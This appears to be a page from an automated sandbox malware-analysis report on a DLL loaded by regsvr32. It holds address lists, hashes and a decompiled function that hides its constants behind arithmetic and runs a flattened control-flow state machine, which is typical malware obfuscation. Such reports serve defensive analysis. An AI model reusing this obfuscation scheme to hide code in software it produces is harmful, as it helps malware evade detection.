                                                                                                                0x1003946e
                                                                                                                0x10039471
                                                                                                                0x10039474
                                                                                                                0x10039477
                                                                                                                0x100394ca
                                                                                                                0x100394ca
                                                                                                                0x100394cd
                                                                                                                0x100395ff
                                                                                                                0x10039578
                                                                                                                0x1003957c
                                                                                                                0x10039581
                                                                                                                0x10039586
                                                                                                                0x10039588
                                                                                                                0x1003958a
                                                                                                                0x1003958d
                                                                                                                0x10039599
                                                                                                                0x10039599
                                                                                                                0x1003958d
                                                                                                                0x1003959f
                                                                                                                0x100395a5
                                                                                                                0x100395ab
                                                                                                                0x100395ae
                                                                                                                0x100395bb
                                                                                                                0x100395be
                                                                                                                0x100395c3
                                                                                                                0x100395c3
                                                                                                                0x100395cb
                                                                                                                0x100395cc
                                                                                                                0x100395cf
                                                                                                                0x100395cf
                                                                                                                0x100395d1
                                                                                                                0x100395d1
                                                                                                                0x100395d5
                                                                                                                0x100395db
                                                                                                                0x100395df
                                                                                                                0x100395e5
                                                                                                                0x100395e8
                                                                                                                0x100395ed
                                                                                                                0x100395df
                                                                                                                0x00000000
                                                                                                                0x100395d5
                                                                                                                0x100394d8
                                                                                                                0x100394e2
                                                                                                                0x100394e2
                                                                                                                0x100394e4
                                                                                                                0x100394e7
                                                                                                                0x100394f1
                                                                                                                0x100394f4
                                                                                                                0x100394fa
                                                                                                                0x100394fc
                                                                                                                0x100394fc
                                                                                                                0x100394ff
                                                                                                                0x100394ff
                                                                                                                0x10039517
                                                                                                                0x1003951d
                                                                                                                0x10039524
                                                                                                                0x10039532
                                                                                                                0x1003953d
                                                                                                                0x10039543
                                                                                                                0x10039546
                                                                                                                0x10039549
                                                                                                                0x1003955c
                                                                                                                0x1003955c
                                                                                                                0x1003956f
                                                                                                                0x00000000
                                                                                                                0x10039526
                                                                                                                0x10039529
                                                                                                                0x1003952e
                                                                                                                0x10039530
                                                                                                                0x10039575
                                                                                                                0x10039575
                                                                                                                0x00000000
                                                                                                                0x10039575
                                                                                                                0x00000000
                                                                                                                0x10039530
                                                                                                                0x10039524
                                                                                                                0x10039479
                                                                                                                0x1003947c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003947e
                                                                                                                0x10039484
                                                                                                                0x100394b3
                                                                                                                0x100394b6
                                                                                                                0x100394c0
                                                                                                                0x100394c0
                                                                                                                0x10039486
                                                                                                                0x1003948a
                                                                                                                0x100394a8
                                                                                                                0x100394a8
                                                                                                                0x00000000
                                                                                                                0x100393e8
                                                                                                                0x100393ee
                                                                                                                0x00000000
                                                                                                                0x100393ee
                                                                                                                0x100393e6
                                                                                                                0x10039391
                                                                                                                0x10039396
                                                                                                                0x10039399
                                                                                                                0x1003939f
                                                                                                                0x100393a8
                                                                                                                0x100393ab
                                                                                                                0x100393ab
                                                                                                                0x100393ad
                                                                                                                0x100393ad
                                                                                                                0x100393b0
                                                                                                                0x100393b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003936a
                                                                                                                0x1003936c
                                                                                                                0x10039372
                                                                                                                0x10039375
                                                                                                                0x10039375
                                                                                                                0x00000000
                                                                                                                0x1003936c
                                                                                                                0x10039368
                                                                                                                0x10039337
                                                                                                                0x1003960d
                                                                                                                0x1003960d
                                                                                                                0x1003960d
                                                                                                                0x10039613
                                                                                                                0x100396d8
                                                                                                                0x100396dd
                                                                                                                0x100396dd
                                                                                                                0x10039619
                                                                                                                0x10039633
                                                                                                                0x10039633
                                                                                                                0x10039638
                                                                                                                0x1003963a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003961d
                                                                                                                0x1003961f
                                                                                                                0x10039644
                                                                                                                0x10039644
                                                                                                                0x1003964a
                                                                                                                0x10039654
                                                                                                                0x1003965a
                                                                                                                0x1003965d
                                                                                                                0x10039664
                                                                                                                0x10039664
                                                                                                                0x10039666
                                                                                                                0x10039666
                                                                                                                0x1003966c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003966e
                                                                                                                0x10039670
                                                                                                                0x100396d2
                                                                                                                0x100396d3
                                                                                                                0x00000000
                                                                                                                0x100396d3
                                                                                                                0x10039672
                                                                                                                0x10039678
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003967a
                                                                                                                0x10039680
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039682
                                                                                                                0x10039688
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003968a
                                                                                                                0x10039690
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039692
                                                                                                                0x10039698
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003969a
                                                                                                                0x100396a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396a2
                                                                                                                0x100396a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396aa
                                                                                                                0x100396b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396b2
                                                                                                                0x100396b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396ba
                                                                                                                0x100396c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396c2
                                                                                                                0x100396c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396ca
                                                                                                                0x100396d0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100396d0
                                                                                                                0x1003965f
                                                                                                                0x10039661
                                                                                                                0x00000000
                                                                                                                0x10039661
                                                                                                                0x1003964c
                                                                                                                0x10039652
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039652
                                                                                                                0x10039621
                                                                                                                0x10039627
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039632
                                                                                                                0x10039632
                                                                                                                0x1003963c
                                                                                                                0x1003963e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003963e

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State_memset$Parent$ClientCursorH_prolog3ScreenWindow
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2864161637-3887548279
                                                                                                                • Opcode ID: 7da60bfdff267e6b7c4e47dcfc54ad25e16cfe49b3ceb7a364a6153053e1811c
                                                                                                                • Instruction ID: 5ccd009687c04cb6e758ef9d5c2076c28791b587b2bada6c16d7db9d2372eb1a
                                                                                                                • Opcode Fuzzy Hash: 7da60bfdff267e6b7c4e47dcfc54ad25e16cfe49b3ceb7a364a6153053e1811c
                                                                                                                • Instruction Fuzzy Hash: D9C1AD71B01615AFEF52CFA4CC8AB9E77B5FF08392F110125EA16AF1A1D770A980CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B0503 Relevance: 30.8, Strings: 24, Instructions: 779COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001B0503(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t891;
				void* _t894;
				void* _t900;
				intOrPtr _t902;
				void* _t908;
				void* _t910;
				void* _t912;
				void* _t915;
				void* _t929;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				void* _t968;
				void* _t993;
				void* _t1053;
				intOrPtr* _t1073;
				signed int _t1075;
				void* _t1076;
				void* _t1080;
				void* _t1081;
				void* _t1087;

				_t1073 = __ecx;
				_v84 = __ecx;
				_v408 = 0xdcbd13;
				_v408 = _v408 * 0x2c;
				_v408 = _v408 ^ 0x9fa068a9;
				_t1080 = 0;
				_v408 = _v408 + 0x2b5c;
				_t929 = 0xd000b28;
				_v408 = _v408 ^ 0xba504349;
				_v136 = 0x8217ac;
				_v136 = _v136 << 4;
				_v136 = _v136 ^ 0x08217ac0;
				_v120 = 0x3140f2;
				_v120 = _v120 >> 2;
				_v120 = _v120 ^ 0x000c503c;
				_v232 = 0x67c070;
				_v232 = _v232 ^ 0x0fc20f40;
				_v232 = _v232 ^ 0x0fa5cf30;
				_v164 = 0x4501eb;
				_v164 = _v164 | 0xaf0220db;
				_v164 = _v164 ^ 0xaf4721fb;
				_v148 = 0xaa80f2;
				_v148 = _v148 + 0xffffa89e;
				_v148 = _v148 ^ 0x00aa2990;
				_v196 = 0xa41f1c;
				_v196 = _v196 ^ 0xc80d6d99;
				_v196 = _v196 ^ 0xc8a97285;
				_v404 = 0x19596a;
				_v404 = _v404 << 4;
				_t936 = 0x7f;
				_v404 = _v404 / _t936;
				_v404 = _v404 + 0xffff843f;
				_v404 = _v404 ^ 0x0002b5cf;
				_v432 = 0x75da42;
				_v432 = _v432 ^ 0x7700d48f;
				_v432 = _v432 | 0x189e2cc9;
				_v432 = _v432 * 0x3f;
				_v432 = _v432 ^ 0x7fcc8473;
				_v216 = 0x9289cb;
				_v216 = _v216 * 0x5a;
				_v216 = _v216 ^ 0x3384715e;
				_v296 = 0x4385cb;
				_v296 = _v296 + 0x68d6;
				_v296 = _v296 >> 0xf;
				_v296 = _v296 ^ 0x00000087;
				_v140 = 0x7abe17;
				_v140 = _v140 * 0x46;
				_v140 = _v140 ^ 0x218ffa4a;
				_v316 = 0xdc0bd1;
				_v316 = _v316 ^ 0xf61b824a;
				_v316 = _v316 * 0xd;
				_v316 = _v316 ^ 0x882386c3;
				_v260 = 0x42d713;
				_v260 = _v260 ^ 0x3fb9ebbf;
				_v260 = _v260 << 6;
				_v260 = _v260 ^ 0xfec4baad;
				_v384 = 0x210b88;
				_v384 = _v384 >> 3;
				_v384 = _v384 + 0xfffff2fe;
				_v384 = _v384 * 0x11;
				_v384 = _v384 ^ 0x004a4663;
				_v208 = 0xa6dde0;
				_v208 = _v208 << 1;
				_v208 = _v208 ^ 0x0145ee8f;
				_v308 = 0x5fa396;
				_v308 = _v308 << 0xc;
				_v308 = _v308 * 0x4c;
				_v308 = _v308 ^ 0x49078b95;
				_v416 = 0xba9c37;
				_t937 = 0x43;
				_v416 = _v416 / _t937;
				_v416 = _v416 >> 3;
				_v416 = _v416 ^ 0xa5e5f9a3;
				_v416 = _v416 ^ 0xa5e8835c;
				_v276 = 0x3c3cf3;
				_v276 = _v276 >> 7;
				_t938 = 6;
				_v276 = _v276 * 0x35;
				_v276 = _v276 ^ 0x001a85ca;
				_v236 = 0x1d3562;
				_v236 = _v236 << 2;
				_v236 = _v236 ^ 0x0078b008;
				_v300 = 0x3bd319;
				_v300 = _v300 ^ 0x74442c22;
				_t143 =  &_v300; // 0x74442c22
				_v300 =  *_t143 / _t938;
				_v300 = _v300 ^ 0x13624aba;
				_v352 = 0x483b69;
				_t152 =  &_v352; // 0x483b69
				_t939 = 0x32;
				_v352 =  *_t152 / _t939;
				_v352 = _v352 ^ 0x0f7391c0;
				_t940 = 0x3c;
				_v352 = _v352 * 0x5d;
				_v352 = _v352 ^ 0x9cb37344;
				_v244 = 0x8c6f57;
				_v244 = _v244 / _t940;
				_v244 = _v244 << 3;
				_v244 = _v244 ^ 0x001b8794;
				_v200 = 0xfefccc;
				_v200 = _v200 | 0xadc82419;
				_v200 = _v200 ^ 0xadfa7f46;
				_v268 = 0x259b5a;
				_v268 = _v268 + 0xffffb4dc;
				_v268 = _v268 << 1;
				_v268 = _v268 ^ 0x00481c3a;
				_v184 = 0x1d8382;
				_v184 = _v184 ^ 0xe214a976;
				_v184 = _v184 ^ 0xe20aeaac;
				_v108 = 0x322658;
				_v108 = _v108 ^ 0xb3215236;
				_v108 = _v108 ^ 0xb314ed55;
				_v192 = 0xd0e37f;
				_v192 = _v192 | 0xea7c68cb;
				_v192 = _v192 ^ 0xeaf1932b;
				_v340 = 0x4ec88d;
				_v340 = _v340 | 0x7def4379;
				_v340 = _v340 ^ 0x7dee2cc9;
				_v176 = 0x9a25f4;
				_v176 = _v176 >> 4;
				_v176 = _v176 ^ 0x000b053a;
				_v128 = 0x47e367;
				_v128 = _v128 | 0x8594dd23;
				_v128 = _v128 ^ 0x85d2f1bf;
				_v292 = 0x1f0c9a;
				_v292 = _v292 >> 0xa;
				_v292 = _v292 * 0x50;
				_v292 = _v292 ^ 0x00098dd6;
				_v132 = 0x2535c6;
				_v132 = _v132 + 0x6441;
				_v132 = _v132 ^ 0x00275336;
				_v160 = 0x683362;
				_v160 = _v160 | 0x6eccd198;
				_v160 = _v160 ^ 0x6ee99dcb;
				_v320 = 0xb4168e;
				_v320 = _v320 | 0x3e248d21;
				_v320 = _v320 >> 1;
				_v320 = _v320 ^ 0x1f5df3b0;
				_v156 = 0xa84009;
				_t941 = 0x19;
				_v156 = _v156 / _t941;
				_v156 = _v156 ^ 0x000281e4;
				_v372 = 0xe06e;
				_v372 = _v372 >> 0xa;
				_v372 = _v372 + 0xffffb8e0;
				_v372 = _v372 << 0xe;
				_v372 = _v372 ^ 0xee47a634;
				_v380 = 0xf39f5d;
				_v380 = _v380 + 0xffffde02;
				_v380 = _v380 + 0xffff94fc;
				_v380 = _v380 ^ 0x0a9af6d5;
				_v380 = _v380 ^ 0x0a61b720;
				_v264 = 0xca2342;
				_t942 = 0x38;
				_t1075 = 0x4b;
				_v264 = _v264 * 0x67;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x005b75da;
				_v220 = 0xe375df;
				_v220 = _v220 << 0xf;
				_v220 = _v220 ^ 0xbaead6ae;
				_v428 = 0x9948c;
				_v428 = _v428 + 0xffff8057;
				_v428 = _v428 + 0xffff7a4f;
				_v428 = _v428 / _t942;
				_v428 = _v428 ^ 0x00028132;
				_v272 = 0x9fc6c4;
				_v272 = _v272 / _t1075;
				_v272 = _v272 + 0xfffff7c2;
				_v272 = _v272 ^ 0x00029ac0;
				_v412 = 0x702983;
				_v412 = _v412 + 0xffffc448;
				_t943 = 3;
				_v412 = _v412 / _t943;
				_v412 = _v412 + 0x2a23;
				_v412 = _v412 ^ 0x002a58c9;
				_v256 = 0xd025cc;
				_v256 = _v256 / _t1075;
				_v256 = _v256 | 0x6b25516d;
				_v256 = _v256 ^ 0x6b230984;
				_v204 = 0xf56d4c;
				_v204 = _v204 + 0xa994;
				_v204 = _v204 ^ 0x00f7552e;
				_v420 = 0xbe5e0e;
				_v420 = _v420 ^ 0x768a176b;
				_v420 = _v420 | 0xf3a5928d;
				_v420 = _v420 ^ 0x926f3859;
				_v420 = _v420 ^ 0x65ddee5a;
				_v212 = 0x2f1b22;
				_v212 = _v212 | 0x36e9c8a5;
				_v212 = _v212 ^ 0x36eb3d71;
				_v180 = 0x9d012e;
				_v180 = _v180 >> 3;
				_v180 = _v180 ^ 0x0013a789;
				_v396 = 0x2ecbc9;
				_v396 = _v396 + 0xb013;
				_v396 = _v396 + 0xffff1e6e;
				_v396 = _v396 ^ 0x3b0a35fd;
				_v396 = _v396 ^ 0x3b2027c2;
				_v188 = 0x6a7b31;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 ^ 0x00005d78;
				_v172 = 0x139356;
				_t944 = 0x3e;
				_v172 = _v172 * 0x54;
				_v172 = _v172 ^ 0x0664671f;
				_v388 = 0xf8060b;
				_v388 = _v388 / _t944;
				_t945 = 0x1b;
				_v388 = _v388 / _t945;
				_v388 = _v388 ^ 0x52ea613f;
				_v388 = _v388 ^ 0x52e1ab72;
				_v240 = 0x49a9c2;
				_v240 = _v240 | 0xac7f8aa4;
				_v240 = _v240 + 0xffffed5c;
				_v240 = _v240 ^ 0xac73f442;
				_v248 = 0x656f20;
				_t396 =  &_v248; // 0x656f20
				_t946 = 0x16;
				_v248 =  *_t396 * 0x1b;
				_t398 =  &_v248; // 0x656f20
				_v248 =  *_t398 * 0x5d;
				_v248 = _v248 ^ 0xe2ea5bea;
				_v360 = 0x69eb4e;
				_v360 = _v360 + 0xffffc199;
				_v360 = _v360 * 0x37;
				_v360 = _v360 >> 3;
				_v360 = _v360 ^ 0x02d5e6f0;
				_v116 = 0x5a0c82;
				_v116 = _v116 | 0x5f967149;
				_v116 = _v116 ^ 0x5fd153ac;
				_v252 = 0xc50c6e;
				_v252 = _v252 + 0xffff3d38;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x49a8a7b6;
				_v288 = 0xf16b72;
				_v288 = _v288 << 5;
				_v288 = _v288 / _t946;
				_v288 = _v288 ^ 0x01535cb6;
				_v424 = 0x190e27;
				_v424 = _v424 >> 0xa;
				_t947 = 0x7f;
				_v424 = _v424 * 0x32;
				_v424 = _v424 | 0x0e64d2e8;
				_v424 = _v424 ^ 0x0e6330f3;
				_v124 = 0x82dc64;
				_v124 = _v124 + 0x59d0;
				_v124 = _v124 ^ 0x00809703;
				_v368 = 0x532036;
				_v368 = _v368 / _t947;
				_v368 = _v368 ^ 0xabb15eca;
				_v368 = _v368 ^ 0xb1aa33e6;
				_v368 = _v368 ^ 0x1a11b223;
				_v224 = 0x85a5e0;
				_v224 = _v224 | 0x8f625e6c;
				_v224 = _v224 ^ 0x8fed7ce8;
				_v392 = 0x6bbefa;
				_v392 = _v392 + 0x83d3;
				_t948 = 0x2f;
				_v392 = _v392 * 0x19;
				_v392 = _v392 << 0xd;
				_v392 = _v392 ^ 0x50ce0660;
				_v440 = 0xdb3332;
				_v440 = _v440 ^ 0x35e94d80;
				_v440 = _v440 >> 2;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x000e8a12;
				_v152 = 0x7c17c3;
				_v152 = _v152 + 0xcc70;
				_v152 = _v152 ^ 0x007c0747;
				_v324 = 0xca910e;
				_v324 = _v324 * 0x57;
				_v324 = _v324 << 9;
				_v324 = _v324 ^ 0xae90991e;
				_v144 = 0xed532b;
				_v144 = _v144 | 0x70aef639;
				_v144 = _v144 ^ 0x70e9c08c;
				_v284 = 0xd9fe9a;
				_v284 = _v284 / _t948;
				_v284 = _v284 + 0xbf07;
				_v284 = _v284 ^ 0x00019afa;
				_v332 = 0xe0663d;
				_v332 = _v332 + 0xe2e6;
				_v332 = _v332 + 0xffff4fed;
				_v332 = _v332 ^ 0x00ee3e0b;
				_v304 = 0x883e3e;
				_v304 = _v304 << 8;
				_v304 = _v304 >> 0xe;
				_v304 = _v304 ^ 0x0002f2f4;
				_v312 = 0x476ea6;
				_v312 = _v312 + 0xea5a;
				_t949 = 0x60;
				_v312 = _v312 / _t949;
				_v312 = _v312 ^ 0x000789b0;
				_v228 = 0xd1112e;
				_t950 = 6;
				_v228 = _v228 / _t950;
				_v228 = _v228 ^ 0x002ddd98;
				_v448 = 0x74e7fb;
				_v448 = _v448 << 0xf;
				_v448 = _v448 ^ 0x083c0224;
				_t951 = 0xe;
				_v448 = _v448 / _t951;
				_v448 = _v448 ^ 0x08d5b0a2;
				_v328 = 0xb30da3;
				_t952 = 0x51;
				_v328 = _v328 / _t952;
				_v328 = _v328 + 0xffff16f6;
				_v328 = _v328 ^ 0x0003878e;
				_v336 = 0xeb24d9;
				_v336 = _v336 >> 6;
				_v336 = _v336 | 0x93901690;
				_v336 = _v336 ^ 0x93998dde;
				_v436 = 0x3822a3;
				_v436 = _v436 + 0xcee2;
				_v436 = _v436 ^ 0x810052d2;
				_t953 = 0x33;
				_v436 = _v436 / _t953;
				_v436 = _v436 ^ 0x028f8bb9;
				_v444 = 0x657637;
				_t954 = 0x50;
				_v444 = _v444 / _t954;
				_v444 = _v444 << 9;
				_t955 = 0x27;
				_v444 = _v444 / _t955;
				_v444 = _v444 ^ 0x001d5e8d;
				_v280 = 0xdf6806;
				_t956 = 0x70;
				_v280 = _v280 / _t956;
				_v280 = _v280 + 0xffff6aaa;
				_v280 = _v280 ^ 0x000f185a;
				_v344 = 0x572d4;
				_v344 = _v344 ^ 0xbbe28ac2;
				_t957 = 0x65;
				_v344 = _v344 * 0x19;
				_v344 = _v344 ^ 0x59aa8056;
				_v168 = 0xc8e49c;
				_v168 = _v168 / _t957;
				_v168 = _v168 ^ 0x00047aef;
				_v400 = 0x521f3b;
				_v400 = _v400 ^ 0xf63b9b64;
				_v400 = _v400 ^ 0x9c3d7bea;
				_v400 = _v400 + 0x3385;
				_v400 = _v400 ^ 0x6a5233e1;
				_v376 = 0x7a699e;
				_v376 = _v376 | 0xfe6a8076;
				_v376 = _v376 >> 6;
				_v376 = _v376 + 0xd251;
				_v376 = _v376 ^ 0x03ffdfcc;
				_v112 = 0xc756f2;
				_t958 = 0xa;
				_v112 = _v112 / _t958;
				_v112 = _v112 ^ 0x0013a0e6;
				_v348 = 0xf39f77;
				_v348 = _v348 | 0xd8d23809;
				_t959 = 0x68;
				_v348 = _v348 / _t959;
				_t960 = 0x4f;
				_v348 = _v348 / _t960;
				_v348 = _v348 ^ 0x0007a29a;
				_v356 = 0x864313;
				_v356 = _v356 | 0x526b73fd;
				_t1076 = 0x23b9606;
				_t961 = 0x69;
				_v356 = _v356 / _t961;
				_v356 = _v356 >> 9;
				_v356 = _v356 ^ 0x0002ba2b;
				_v364 = 0x55b1e8;
				_t962 = 0x5a;
				_v80 = 0x48;
				_v364 = _v364 / _t962;
				_v364 = _v364 ^ 0x05aefe6c;
				_v364 = _v364 ^ 0xc7e9cdd2;
				_v364 = _v364 ^ 0xc2468ef2;
				while(1) {
					L1:
					while(1) {
						L2:
						_t1053 = 0xb7574b4;
						while(1) {
							L3:
							_t891 = 0x5efe29c;
							do {
								while(1) {
									L4:
									_t1087 = _t929 - _t891;
									if(_t1087 <= 0) {
										break;
									}
									__eflags = _t929 - 0x89e8397;
									if(_t929 == 0x89e8397) {
										E001B2519(_v348, _v100, _v356, _v140, _v364);
										_t929 = 0xb88ca79;
										goto L33;
									} else {
										__eflags = _t929 - _t1053;
										if(_t929 == _t1053) {
											_t894 = E001AC01C(_v156, _v164, _v372, _v380, _v104);
											_t1081 = _t1081 + 0xc;
											__eflags = _t894 - _v148;
											_t968 = 0xdb00a42;
											_t929 =  ==  ? 0xdb00a42 : 0x4084ff9;
											goto L2;
										} else {
											__eflags = _t929 - 0xd000b28;
											if(__eflags == 0) {
												_t929 = 0x41fbdc1;
												continue;
											} else {
												__eflags = _t929 - _t968;
												if(__eflags == 0) {
													_push(_v272);
													_push(0x1a1544);
													_push(_v428);
													_t1078 = E001BF5D9(_v264, _v220, __eflags);
													_v96 = _v80;
													_t900 = E001AA838(_v104, _v412,  &_v96,  &_v76, _v196, _t896, _v256, _v264, _v204, _v420, _v80, _v212);
													_t1081 = _t1081 + 0x34;
													__eflags = _t900 - _v404;
													if(_t900 != _v404) {
														_t929 = 0x4084ff9;
													} else {
														_push(_v188);
														_t902 =  *0x1c4208; // 0x0
														_push(_t902 + 0x20);
														_push(_v396);
														_push( &_v68);
														_t993 = 0x40;
														E001BFD42(_t993, _v180);
														_t1081 = _t1081 + 0x10;
														_t929 = 0x5aa176b;
													}
													E001BF94B(_t1078, _v172, _v388, _v240, _v248);
													L14:
													_t1076 = 0x23b9606;
													L33:
													_t1081 = _t1081 + 0xc;
													L34:
													_t1053 = 0xb7574b4;
													_t891 = 0x5efe29c;
												} else {
													__eflags = _t929 - 0xe6b3197;
													if(__eflags == 0) {
														E001BA379(_v436, _v444, _v280, _v92, _v344);
														_t1081 = _t1081 + 0xc;
														_t929 = 0x4084ff9;
														while(1) {
															L1:
															L2:
															_t1053 = 0xb7574b4;
															L3:
															_t891 = 0x5efe29c;
															goto L4;
														}
													}
												}
											}
										}
									}
									goto L35;
								}
								if(_t1087 == 0) {
									_t908 = E001B970D(_v104, _v92, _v296, _v304, _v312,  &_v88, _v228);
									_t1081 = _t1081 + 0x14;
									__eflags = _t908;
									_t929 =  ==  ? _t1076 : 0xe6b3197;
									goto L1;
								} else {
									if(_t929 == 0x1eb79de) {
										_v96 = 0x100;
										_t910 = E001AC98B(_v132, _v160, _v100, _v120, _v320, 0x100,  &_v104);
										_t1081 = _t1081 + 0x14;
										__eflags = _t910 - _v232;
										_t1053 = 0xb7574b4;
										_t968 = 0xdb00a42;
										_t929 =  ==  ? 0xb7574b4 : 0x89e8397;
										goto L3;
									} else {
										if(_t929 == _t1076) {
											_t912 = E001AED0A(_v88);
											_t929 = 0x2987a46;
											__eflags = _t912;
											_t1080 =  !=  ? 1 : _t1080;
											while(1) {
												L1:
												goto L2;
											}
										} else {
											if(_t929 == 0x2987a46) {
												E001B64CF(_v448, _v328, _v336, _v88);
												_t929 = 0xe6b3197;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t929 == 0x4084ff9) {
													E001BA379(_v168, _v400, _v376, _v104, _v112);
													_t1081 = _t1081 + 0xc;
													_t929 = 0x89e8397;
													while(1) {
														L1:
														goto L2;
													}
												} else {
													if(_t929 == 0x41fbdc1) {
														_push(_v208);
														_push(0x1a1634);
														_push(_v384);
														_t915 = E001BF5D9(_v316, _v260, __eflags);
														_push(_v236);
														_push(0x1a1504);
														_push(_v276);
														__eflags = E001AD2C9(_t915, _v408, _v300, _v352,  &_v100, _v244, _v200, E001BF5D9(_v308, _v416, __eflags)) - _v136;
														_t929 =  ==  ? 0x1eb79de : 0xb88ca79;
														E001BF94B(_t915, _v268, _v184, _v108, _v192);
														_t1081 = _t1081 + 0x3c;
														E001BF94B(_t916, _v340, _v176, _v128, _v292);
														_t1073 = _v84;
														goto L14;
													} else {
														_t1093 = _t929 - 0x5aa176b;
														if(_t929 == 0x5aa176b) {
															_push(_v288);
															_push(0x1a1544);
															_t706 =  &_v252; // 0xe2ea5bea
															_push( *_t706);
															E001A866C(_v424,  *((intOrPtr*)(_t1073 + 4)), _v124, _v368,  &_v92, _v224, _v100, _v432,  *_t1073, _v392, _v440, _v152, _v360, E001BF5D9(_v360, _v116, _t1093));
															_t929 =  ==  ? 0x5efe29c : 0x4084ff9;
															E001BF94B(_t923, _v324, _v144, _v284, _v332);
															_t1081 = _t1081 + 0x48;
															_t1076 = 0x23b9606;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
								L35:
							} while (_t929 != 0xb88ca79);
							return _t1080;
						}
					}
				}
			}















































































































































                                                                                                                0x001b050d
                                                                                                                0x001b050f
                                                                                                                0x001b0516
                                                                                                                0x001b0525
                                                                                                                0x001b0529
                                                                                                                0x001b0531
                                                                                                                0x001b0533
                                                                                                                0x001b053b
                                                                                                                0x001b0540
                                                                                                                0x001b0548
                                                                                                                0x001b0553
                                                                                                                0x001b055b
                                                                                                                0x001b0566
                                                                                                                0x001b0571
                                                                                                                0x001b0579
                                                                                                                0x001b0584
                                                                                                                0x001b058f
                                                                                                                0x001b059a
                                                                                                                0x001b05a5
                                                                                                                0x001b05b0
                                                                                                                0x001b05bb
                                                                                                                0x001b05c6
                                                                                                                0x001b05d1
                                                                                                                0x001b05dc
                                                                                                                0x001b05e7
                                                                                                                0x001b05f2
                                                                                                                0x001b05fd
                                                                                                                0x001b0608
                                                                                                                0x001b0610
                                                                                                                0x001b061b
                                                                                                                0x001b061e
                                                                                                                0x001b0622
                                                                                                                0x001b062a
